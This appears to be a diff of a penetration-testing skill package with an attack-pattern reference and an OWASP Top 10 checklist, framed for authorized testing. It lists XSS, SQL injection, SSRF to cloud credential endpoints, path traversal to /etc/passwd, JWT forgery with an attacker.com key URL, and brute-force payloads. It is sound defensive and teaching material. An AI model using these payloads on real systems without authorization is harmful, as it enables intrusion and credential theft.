' AND IF(1=1, SLEEP(5), 0)-- -- MySQL
' AND pg_sleep(5)-- -- PostgreSQL
' WAITFOR DELAY '0:0:5'-- -- MSSQL
```
### SSRF Detection
**Payloads for SSRF testing:**
```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/ (AWS metadata)
http://metadata.google.internal/ (GCP metadata)
http://169.254.169.254/metadata/instance (Azure metadata)
http://[::1] (IPv6 localhost)
http://0x7f000001 (hex encoding)
http://2130706433 (decimal encoding)
```
### Path Traversal
```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd (double encoding)
```
---
## Infrastructure Security
### Misconfigured Cloud Storage
**S3 Bucket Checks:**
```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request
# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket
# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```
**Common Bucket Name Patterns:**
```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```
### HTTP Security Headers
Required headers and expected values:
| Header | Expected Value |
|--------|---------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated, CSP is preferred) |
### TLS Configuration
```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com
# Quick check with testssl.sh
./testssl.sh target.com
# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```
**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC mode ciphers (BEAST), export-grade ciphers.
### Open Port Scanning
```bash
# Quick top-1000 ports
nmap -sV target.com
# Full port scan
nmap -p- -sV target.com
# Common dangerous open ports
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```
---
## Pen Test Report Generation
Generate professional reports from structured findings:
```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md
# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```
### Findings JSON Format
```json
[
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"]
}
]
```
### Report Structure
1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
---
## Responsible Disclosure Workflow
Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.
### Timeline
| Day | Action |
|-----|--------|
| 0 | Discovery — document finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |
### Key Principles
1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend deadline if they're actively working on a fix
---
## Workflows
### Workflow 1: Quick Security Check (15 Minutes)
For pre-merge reviews or quick health checks:
```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick
# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high
# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in Secret Scanning section)
# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```
**Decision**: If any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)
**Day 1 — Reconnaissance:**
1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history
**Day 2 — Manual Testing:**
1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)
**Day 3 — Infrastructure and Reporting:**
1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report
```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate
Automated security checks that run on every pull request:
```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
security:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
# Secret scanning
- name: Scan for secrets
uses: trufflesecurity/trufflehog@main
with:
extra_args: --only-verified
# Dependency audit
- name: Audit dependencies
run: |
npm audit --audit-level=high
pip audit --desc
# SAST
- name: Static analysis
uses: returntocorp/semgrep-action@v1
with:
config: >-
p/security-audit
p/secrets
p/owasp-top-ten
# Security headers check (staging only)
- name: Check security headers
if: github.base_ref == 'staging'
run: |
curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```
**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---
## Anti-Patterns
1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| [senior-secops](../senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](../senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](../../engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](../code-reviewer/SKILL.md) | Code review practices — includes security review checklist |

View File

@@ -0,0 +1,549 @@
# Attack Patterns Reference
Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.
---
## XSS Test Payloads
### Reflected XSS
These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.
**Basic payloads:**
```
<script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
'><script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<body onload=alert(document.domain)>
<input onfocus=alert(document.domain) autofocus>
<marquee onstart=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
```
**Filter bypass payloads:**
```
<ScRiPt>alert(document.domain)</ScRiPt>
<scr<script>ipt>alert(document.domain)</scr</script>ipt>
<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">
<svg/onload=alert(document.domain)>
javascript:alert(document.domain)//
```
**URL encoding payloads:**
```
%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```
**Context-specific payloads:**
Inside HTML attribute:
```
" onmouseover="alert(document.domain)
' onfocus='alert(document.domain)' autofocus='
```
Inside JavaScript string:
```
';alert(document.domain);//
\';alert(document.domain);//
</script><script>alert(document.domain)</script>
```
Inside CSS:
```
expression(alert(document.domain))
url(javascript:alert(document.domain))
```
### Stored XSS
Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.
```
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.domain)">click me</a>
<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
```
### DOM-Based XSS
Look for JavaScript that reads from these sources and writes to dangerous sinks:
**Sources** (attacker-controlled input):
```
document.location
document.location.hash
document.location.search
document.referrer
window.name
document.cookie
localStorage / sessionStorage
postMessage data
```
**Sinks** (dangerous output):
```
element.innerHTML
element.outerHTML
document.write()
document.writeln()
eval()
setTimeout(string)
setInterval(string)
new Function(string)
element.setAttribute("onclick", ...)
location.href = ...
location.assign(...)
```
**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.
---
## SQL Injection Detection Patterns
### Detection Payloads
**Error-based detection:**
```
' -- Single quote triggers SQL error
" -- Double quote
\ -- Backslash
' OR '1'='1 -- Boolean true
' OR '1'='2 -- Boolean false (compare responses)
' AND 1=1-- -- Boolean true with comment
' AND 1=2-- -- Boolean false (compare responses)
1 OR 1=1 -- Numeric injection
1 AND 1=2 -- Numeric false
```
**Union-based enumeration** (authorized testing only):
```sql
-- Step 1: Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- -- Increment until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL-- -- Match column count
-- Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
-- Step 3: Extract database info
' UNION SELECT version(),NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```
**Time-based blind injection:**
```sql
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)--
-- PostgreSQL
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--
```
**Boolean-based blind injection:**
```sql
-- Extract data one character at a time
' AND SUBSTRING(username,1,1)='a'--
' AND ASCII(SUBSTRING(username,1,1))>96--
' AND ASCII(SUBSTRING(username,1,1))>109-- -- Binary search
```
### Database-Specific Syntax
| Feature | MySQL | PostgreSQL | MSSQL | SQLite |
|---------|-------|------------|-------|--------|
| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` |
| Comment | `-- ` or `#` | `--` | `--` | `--` |
| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` |
| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A |
| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A |
---
## SSRF Detection Techniques
### Basic Payloads
```
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1] -- IPv6 localhost
http://[0000::1] -- IPv6 localhost (expanded)
```
### Cloud Metadata Endpoints
```
# AWS EC2 Metadata (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
# AWS EC2 Metadata (IMDSv2 — requires token header)
# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token
# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/
# GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/
# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token
# DigitalOcean Metadata
http://169.254.169.254/metadata/v1/
```
### Bypass Techniques
**IP encoding tricks:**
```
http://0x7f000001 -- Hex encoding of 127.0.0.1
http://2130706433 -- Decimal encoding of 127.0.0.1
http://0177.0.0.1 -- Octal encoding
http://127.1 -- Shortened
http://127.0.0.1.nip.io -- DNS rebinding via nip.io
```
**URL parsing inconsistencies:**
```
http://127.0.0.1@evil.com -- URL authority confusion
http://evil.com#@127.0.0.1 -- Fragment confusion
http://127.0.0.1%00@evil.com -- Null byte injection
http://evil.com\@127.0.0.1 -- Backslash confusion
```
**Redirect chains:**
```
# If the app follows redirects, find an open redirect first:
https://target.com/redirect?url=http://169.254.169.254/
```
---
## JWT Manipulation Patterns
### Decode Without Verification
JWTs are Base64URL-encoded and can be decoded without the secret:
```bash
# Decode header
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
# Output: {"alg":"HS256"}
# Decode payload
echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d
# Output: {"user":"admin"}
```
### Algorithm Confusion Attacks
**None algorithm attack:**
```json
// Original header
{"alg": "HS256", "typ": "JWT"}
// Modified header — set algorithm to none
{"alg": "none", "typ": "JWT"}
// Token format: header.payload. (empty signature)
```
**RS256 to HS256 confusion:**
If the server uses RS256 (asymmetric), try:
1. Get the server's RSA public key (from JWKS endpoint or TLS certificate)
2. Change `alg` to `HS256`
3. Sign the token using the RSA public key as the HMAC secret
4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key
### Claim Manipulation
```json
// Common claims to modify:
{
"sub": "1234567890", // Change to another user's ID
"role": "admin", // Escalate from "user" to "admin"
"is_admin": true, // Toggle admin flag
"exp": 9999999999, // Extend expiration far into the future
"aud": "admin-api", // Change audience
"iss": "trusted-issuer" // Spoof issuer
}
```
### Weak Secret Brute Force
Common JWT secrets to try (if you have a valid token to test against):
```
secret
password
123456
your-256-bit-secret
jwt_secret
changeme
mysecretkey
HS256-secret
```
Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks.
### JWKS Injection
If the server fetches keys from a JWKS URL in the JWT header:
```json
{
"alg": "RS256",
"jku": "https://attacker.com/.well-known/jwks.json"
}
```
Host your own JWKS with a key pair you control.
---
## API Authorization Testing (IDOR, BOLA)
### IDOR Testing Methodology
**Step 1: Identify resource identifiers**
Map all API endpoints and find parameters that reference resources:
```
GET /api/users/{id}/profile
GET /api/orders/{orderId}
GET /api/documents/{docId}/download
PUT /api/users/{id}/settings
DELETE /api/comments/{commentId}
```
**Step 2: Create two test accounts**
- User A (attacker) and User B (victim)
- Authenticate as both and capture their tokens
**Step 3: Cross-account access testing**
Using User A's token, request User B's resources:
```
# Read
GET /api/users/{B_id}/profile → Should be 403
GET /api/orders/{B_orderId} → Should be 403
# Write
PUT /api/users/{B_id}/settings → Should be 403
PATCH /api/orders/{B_orderId} → Should be 403
# Delete
DELETE /api/comments/{B_commentId} → Should be 403
```
**Step 4: ID manipulation**
```
# Sequential IDs — increment/decrement
/api/users/100 → /api/users/101
# UUID prediction — not practical, but test for leaked UUIDs
# Check if UUIDs appear in other responses
# Encoded IDs — decode and modify
/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx
# Hash-based IDs — check for predictable hashing
/api/users/md5(email) → compute md5 of known emails
```
### BFLA (Broken Function Level Authorization)
Test access to administrative functions:
```
# As regular user, try admin endpoints:
POST /api/admin/users → 403
DELETE /api/admin/users/123 → 403
PUT /api/admin/settings → 403
GET /api/admin/reports → 403
POST /api/admin/impersonate/user123 → 403
# Try HTTP method override:
GET /api/admin/users with X-HTTP-Method-Override: DELETE
POST /api/admin/users with _method=DELETE
```
### Mass Assignment Testing
```json
// Normal user update request:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com"
}
// Mass assignment attempt — add privileged fields:
PUT /api/users/profile
{
"name": "Normal User",
"email": "user@test.com",
"role": "admin",
"is_verified": true,
"is_admin": true,
"balance": 99999,
"subscription": "enterprise",
"permissions": ["admin", "superadmin"]
}
// Then check if any extra fields were persisted:
GET /api/users/profile
```
---
## GraphQL Security Testing Patterns
### Introspection Query
Use this to map the entire schema (should be disabled in production):
```graphql
{
__schema {
queryType { name }
mutationType { name }
types {
name
kind
fields {
name
type {
name
kind
ofType { name kind }
}
args { name type { name } }
}
}
}
}
```
### Query Depth Attack
Nested queries can cause exponential resource consumption:
```graphql
{
users {
friends {
friends {
friends {
friends {
friends {
friends {
name
}
}
}
}
}
}
}
}
```
**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth."
### Query Complexity Attack
Wide queries with aliases:
```graphql
{
a: users(limit: 1000) { name email }
b: users(limit: 1000) { name email }
c: users(limit: 1000) { name email }
d: users(limit: 1000) { name email }
e: users(limit: 1000) { name email }
}
```
### Batch Query Attack
Send multiple operations in a single request to bypass rate limiting:
```json
[
{"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"},
{"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"}
]
```
### Field Suggestion Exploitation
GraphQL often suggests similar field names on typos:
```graphql
{ users { passwor } }
# Response: "Did you mean 'password'?"
```
Use this to discover hidden fields without full introspection.
### Authorization Bypass via Fragments
```graphql
query {
publicUser(id: 1) {
name
...on User {
email # Should be restricted
ssn # Should be restricted
creditCard # Should be restricted
}
}
}
```
---
## Rate Limiting Bypass Techniques
These techniques help verify that rate limiting is robust during authorized testing:
```
# IP rotation — test if rate limiting is per-IP only
X-Forwarded-For: 1.2.3.4
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
# Case variation — test if endpoints are case-sensitive
/api/login
/API/LOGIN
/Api/Login
# Path variation
/api/login
/api/login/
/api/./login
/api/login?dummy=1
# HTTP method variation
POST /api/login
PUT /api/login
# Unicode encoding
/api/logi%6E
```
If any of these bypass rate limiting, the implementation needs hardening.

View File

@@ -0,0 +1,440 @@
# OWASP Top 10 (2021) — Detailed Security Checklist
Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance.
---
## A01:2021 — Broken Access Control
**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863
### Description
Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden |
| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden |
| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins |
| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 |
| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method |
| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized |
| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal |
| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond |
### Code Patterns to Detect
```python
# BAD: No authorization check on resource access
@app.route("/api/documents/<doc_id>")
def get_document(doc_id):
return Document.query.get(doc_id).to_json() # No ownership check!
# GOOD: Verify ownership
@app.route("/api/documents/<doc_id>")
@login_required
def get_document(doc_id):
doc = Document.query.get_or_404(doc_id)
if doc.owner_id != current_user.id:
abort(403)
return doc.to_json()
```
```javascript
// BAD: Client-side only access control
{isAdmin && <AdminPanel />} // Hidden but still accessible via API
// GOOD: Server-side middleware
app.use('/admin/*', requireRole('admin'));
```
### Remediation
1. Deny by default — require explicit authorization for every endpoint
2. Implement server-side access control, never rely on client-side checks
3. Use UUIDs instead of sequential IDs for resource identifiers
4. Log and alert on access control failures
5. Rate limit API requests to minimize automated enumeration
6. Disable CORS or restrict to specific trusted origins
7. Invalidate server-side sessions on logout
### CVSS Scoring Guidance
- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A02:2021 — Cryptographic Failures
**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331
### Description
Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted |
| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed |
| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` |
| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 |
| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params |
| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) |
| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files |
| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) |
### Code Patterns to Detect
```python
# BAD: MD5 for password hashing
password_hash = hashlib.md5(password.encode()).hexdigest()
# BAD: Hardcoded encryption key
cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM)
# BAD: Weak random for tokens
token = str(random.randint(100000, 999999))
# GOOD: bcrypt for passwords
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
# GOOD: Secrets module for tokens
token = secrets.token_urlsafe(32)
```
### Remediation
1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS
2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing
3. Use AES-256-GCM for encryption at rest
4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager)
5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation
6. Enable HSTS with preload
7. Never store sensitive data in URLs or logs
### CVSS Scoring Guidance
- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
---
## A03:2021 — Injection
**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89
### Description
Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling |
| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response |
| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage |
| 4 | XSS (reflected) | Submit `<script>alert(1)</script>` | Input is escaped/encoded in response |
| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage |
| 6 | Command injection | Submit `; whoami` in fields | No command execution |
| 7 | Template injection | Submit `{{7*7}}` | No "49" in response |
| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration |
### Code Patterns to Detect
```python
# BAD: String concatenation in SQL
cursor.execute("SELECT * FROM users WHERE email = '" + email + "'")
cursor.execute(f"SELECT * FROM users WHERE email = '{email}'")
# GOOD: Parameterized query
cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
```
```javascript
// BAD: Template literal in SQL
db.query(`SELECT * FROM users WHERE id = ${userId}`);
// GOOD: Parameterized query
db.query('SELECT * FROM users WHERE id = $1', [userId]);
```
### Remediation
1. Use parameterized queries / prepared statements for ALL database operations
2. Use ORM methods with bound parameters (not raw queries)
3. Validate and sanitize all input on the server side
4. Use Content-Security-Policy to mitigate XSS impact
5. Escape output based on context (HTML, JS, URL, CSS)
6. Never pass user input to eval(), exec(), os.system(), or child_process
7. Use allowlists for expected input formats
### CVSS Scoring Guidance
- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
---
## A04:2021 — Insecure Design
**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522
### Description
Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) |
| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side |
| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered |
| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step |
| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated |
### Remediation
1. Use threat modeling during design phase (STRIDE, PASTA)
2. Implement rate limiting on all sensitive endpoints
3. Validate business logic on the server, never trust client calculations
4. Use state machines for multi-step workflows
5. Implement CAPTCHA for public-facing forms after threshold
### CVSS Scoring Guidance
- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
---
## A05:2021 — Security Misconfiguration
**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388
### Description
The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Default credentials | Try admin:admin, root:root | Rejected |
| 2 | Debug mode | Trigger application errors | No stack traces in response |
| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present |
| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed |
| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) |
| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed |
| 7 | Error messages | Submit invalid data | Generic error messages, no internal details |
### Remediation
1. Disable debug mode in production
2. Remove default credentials and accounts
3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy)
4. Remove Server and X-Powered-By headers
5. Disable directory listing
6. Implement generic error pages
### CVSS Scoring Guidance
- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
---
## A06:2021 — Vulnerable and Outdated Components
**CWEs Covered:** CWE-1035, CWE-1104
### Description
Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities |
| 2 | pip audit | `pip audit --desc` | No known CVEs |
| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities |
| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components |
| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code |
### Remediation
1. Run dependency audits in CI/CD (block merges on critical/high)
2. Set up automated dependency update PRs (Dependabot, Renovate)
3. Pin dependency versions in lock files
4. Remove unused dependencies
5. Subscribe to security advisories for key dependencies
### CVSS Scoring Guidance
Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability.
---
## A07:2021 — Identification and Authentication Failures
**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798
### Description
Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff |
